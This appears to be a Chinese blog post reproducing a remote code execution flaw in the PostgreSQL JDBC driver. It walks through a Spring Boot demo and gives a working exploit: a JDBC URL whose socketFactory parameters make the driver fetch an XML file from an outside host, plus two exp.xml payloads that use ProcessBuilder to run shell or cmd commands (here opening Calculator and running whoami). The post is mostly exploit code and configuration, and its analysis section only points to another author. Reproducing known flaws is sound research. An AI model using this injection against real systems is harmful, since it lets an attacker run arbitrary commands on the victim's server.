PostgreSQL JDBC Driver RCE复现

复现过程

参考https://mp.weixin.qq.com/s/jb7mbPWdMp1vlgF8F1mshg

使用Demo环境:

https://github.com/jirkapinkas/spring-boot-postgresql-docker-compose/

下载下来,拖进IDEA即可。

新建SpringJdbcTemplate2PostgreSqlApplication类:

image.png

代码:

  1. package com.example;
  3. import org.springframework.beans.factory.annotation.Autowired;
  4. import org.springframework.boot.CommandLineRunner;
  5. import org.springframework.boot.SpringApplication;
  6. import org.springframework.boot.autoconfigure.SpringBootApplication;
  7. import org.springframework.jdbc.core.JdbcTemplate;
  9. @SpringBootApplication
  10. public class SpringJdbcTemplate2PostgreSqlApplication implements CommandLineRunner {
  12.     @Autowired
  13.     private JdbcTemplate jdbcTemplate;
  15.     public static void main(String[] args) {
  16.         SpringApplication.run(SpringJdbcTemplate2PostgreSqlApplication.class, args);
  17.     }
  19.     @Override
  20.     public void run(String... args) throws Exception {
  21.         String sql = "INSERT INTO students (name, email) VALUES ("
  22.                 + "'Nam Ha Minh', 'nam@codejava.net')";
  24.         int rows = jdbcTemplate.update(sql);
  25.         if (rows > 0) {
  26.             System.out.println("A new row has been inserted.");
  27.         }
  28.     }
  30. }

application.properties配置文件:

  1. spring.datasource.url=jdbc:postgresql://192.168.91.15:5432/postgres?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.91.1:8888/exp.xml
  2. spring.datasource.username=postgres
  3. spring.datasource.password=postgresql
  5. spring.jpa.hibernate.ddl-auto=create

exp.xml (Linux版本)

  1. <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  2.   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  3.     <constructor-arg>
  4.       <list>
  5.         <value>/bin/bash</value>
  6.         <value>-cc</value>
  7.         <value>open /System/Applications/Calculator.app</value>
  8.       </list>
  9.     </constructor-arg>
  10.   </bean>
  11. </beans>

exp.xml(Windows版本)

  1. <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  2.   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  3.     <constructor-arg>
  4.       <list>
  5.         <value>cmd</value>
  6.         <value>/c</value>
  7.         <value>whoami</value>
  8.       </list>
  9.     </constructor-arg>
  10.   </bean>
  11. </beans>

一切就绪后,运行SpringJdbcTemplate2PostgreSqlApplication的main方法。即可弹出计算器。

image.png

漏洞分析

看看Skay大佬的分析就行了!